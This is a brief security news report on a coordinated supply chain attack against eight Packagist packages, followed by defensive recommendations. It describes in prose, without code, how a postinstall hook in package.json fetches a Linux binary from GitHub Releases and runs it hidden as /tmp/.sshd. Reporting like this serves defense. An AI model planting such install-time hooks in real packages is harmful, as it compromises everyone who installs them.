Packagist Supply Chain Attack Infects 8 Packages Using GitHub-Hosted Linux Malware

A new "coordinated" supply chain attack campaign has impacted eight packages on Packagist including malicious code designed to run a Linux binary retrieved from a GitHub Releases URL. "Although the affected packages were all Composer packages, the malicious code was not added to composer.json," Socket said. "Instead, it was inserted into package.json, targeting projects that ship JavaScript

The report describes a coordinated supply chain attack on eight Packagist (Composer) packages, where attackers modified upstream repositories to add a postinstall script that downloads and executes a Linux binary from a GitHub Releases URL, storing it as /tmp/.sshd and running it in the background.[1] The malicious code was inserted into package.json rather than composer.json, targeting projects that bundle JavaScript build tooling alongside PHP code, and similar payloads were found across hundreds of GitHub files and even GitHub Actions workflows.[1] From a CyberSE.AI perspective, this highlights that AI-enabled or AI-adjacent applications built on common web stacks (PHP/JS) are exposed to the same software supply chain risks, and any AI agents or services built on these ecosystems require rigorous dependency vetting, SBOM generation, and CI/CD controls. Organizations should integrate supply chain scanning, lockfile and integrity enforcement, and GitHub/GitLab workflow hardening into their AI development lifecycle, treating build-time scripts and installer hooks as high-risk execution paths.